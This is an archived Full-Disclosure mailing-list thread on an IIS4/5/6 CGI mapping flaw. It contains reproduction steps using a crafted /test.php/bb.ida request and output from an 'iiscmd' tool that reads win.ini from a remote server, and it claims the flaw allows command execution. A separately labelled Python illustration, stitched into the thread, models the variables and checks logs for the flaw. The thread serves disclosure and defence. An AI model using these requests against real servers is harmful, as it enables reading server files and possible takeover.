Date: Sat, 11 Dec 2010 14:10:02 +0000
From: yuange <yuange1975@...mail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: iis4\iis5 cgi bug and WEB Service CGI
 Interface Vulnerability Analysis (continued)






 
This is the test description I once sent to MS, but the MS developers did not consider it a vulnerability, which is really interesting; they insisted that I provide a successful test case. I couldn't be bothered to talk to their developers any more.


 The test is as follows:
      1. Environment: win2003 with the latest patches + iis6;
      2. Configuration: create the mappings .ida -> c:\windows\system32\idq.dll, .php -> c:\php\php.exe
      3. Test: first open procexp to view process environment variables, then request: http://127.0.0.1/test.php/bb.ida
          Quickly use procexp to open the new php.exe process under the w3wp.exe process and view its environment variables:
          SCRIPT_NAME=/test.php
          PATH_INFO=/test.php/bb.ida
          PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida
     This shows that for the request http://127.0.0.1/test.php/bb.ida, IIS6 identifies the .php mapping, while the variable PATH_TRANSLATED, which is the script the CGI program executes, is PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida, meaning it went and executed the .ida file.
     "So what does that mean? It means I can use any one interpreter to execute any kind of mapped file."
     The simple consequence is that script file contents can be leaked; the serious one is that commands can be executed to control the server.
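As an added illustration (not part of yuange's post or of any tool of his), a Python model of the CGI variables the post reports IIS6 handing to php.exe for that request, plus a check a defender could run over IIS request stems to flag the same interpreter/extension confusion; the web root and the sample stems are assumptions.

```python
# Added example: model of the CGI variables observed in the post and a log check
# for the interpreter/extension confusion it describes. Not the post's code.
from typing import Dict, Optional, Tuple

# Script map from the post's test setup (extension -> interpreter).
SCRIPT_MAP = {".ida": r"c:\windows\system32\idq.dll", ".php": r"c:\php\php.exe"}
DOCROOT = r"c:\inetpub\wwwroot"  # assumed web root, consistent with the post


def _ext(segment: str) -> str:
    """Lower-cased extension of one URL path segment ('' if none)."""
    return segment[segment.rfind("."):].lower() if "." in segment else ""


def observed_cgi_env(url_path: str, script_map: Dict[str, str] = SCRIPT_MAP,
                     docroot: str = DOCROOT) -> Optional[Dict[str, str]]:
    """Variables as the post reports IIS6 setting them: the first segment with a
    mapped extension picks the interpreter and becomes SCRIPT_NAME, but PATH_INFO
    and PATH_TRANSLATED carry the whole request path, so the interpreter is
    pointed at the trailing file rather than at the mapped script."""
    segments = url_path.split("/")
    for i, seg in enumerate(segments):
        if _ext(seg) in script_map:
            return {
                "SCRIPT_NAME": "/".join(segments[: i + 1]),
                "PATH_INFO": url_path,
                "PATH_TRANSLATED": docroot + url_path.replace("/", "\\"),
                "INTERPRETER": script_map[_ext(seg)],
            }
    return None  # no script mapping applies (static file)


def interpreter_confusion(url_path: str,
                          script_map: Dict[str, str] = SCRIPT_MAP) -> Optional[Tuple[str, str]]:
    """Defender check over IIS log URI stems: return (selected_ext, trailing_ext)
    when the trailing segment has a *different* mapped extension than the segment
    that selected the interpreter, i.e. the condition the post demonstrates."""
    env = observed_cgi_env(url_path, script_map)
    if env is None:
        return None
    selected = _ext(env["SCRIPT_NAME"].rsplit("/", 1)[-1])
    trailing = _ext(url_path.rsplit("/", 1)[-1])
    if trailing in script_map and trailing != selected:
        return selected, trailing
    return None


# Constructed sample of IIS log URI stems (not from the post); one matches the bug.
SAMPLE_STEMS = ["/index.php", "/test.php/bb.ida", "/test.php/extra", "/images/logo.jpg"]


def flagged(stems=SAMPLE_STEMS):
    """Stems that exhibit the confusion; these deserve a closer look in the log."""
    return [s for s in stems if interpreter_confusion(s)]
```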
 
 

 

 
 


From: www417@...il.com
Date: Sat, 11 Dec 2010 18:48:09 +0800
Subject: Re: [Full-disclosure] iis4\iis5 cgi bug and WEB Service CGI Interface Vulnerability Analysis (continued)
To: yuange1975@...mail.com


yuange:
 
I had read the Chinese version of this article before, but it did not make much of an impression on me at the time. Rereading it today I found it somewhat enlightening.
 
If I am not mistaken, I think the iiscmd program should be making php.exe interpret the c:\winnt\win.ini file.
But I cannot figure out how arbitrary command execution is achieved...
 
It should not be the brute-force kind of approach like a buffer overflow; it should be a rather clever method.
 

3w417

On 11 Dec 2010 at 2:06 PM, yuange <yuange1975@...mail.com> wrote:


Too many bad things in the belly, going bad fast. In 2000 the IIS vulnerabilities (unicode / decode / cgi / webdav / etc.) reached a peak, and I later moved on to studying RPC. Around 01 I found a serious flaw, an IIS4/5 error-loading CGI vulnerability, to execute arbitrary commands or view arbitrary files. Nearly a decade has passed, and this vulnerability has quickly been eaten away. Because IIS 5.1 moved the core code into the kernel to start IIS, this exploit code has been dropped, so it will not be needed for later versions.
   I wrote an article about this vulnerability some time ago. I did not intend to put it out, but since it feels like it will soon decay, I am releasing it together.

  
http://hi.baidu.com/yuange1975/blog/item/6432bffa52252f0fa8d311ac.html
 
C:\tool>iiscmd -s 192.168.0.112 -f c:\winnt\win.ini
recv:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Dec 2010 05:21:17 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo

Server close!


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 		 	   		  
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ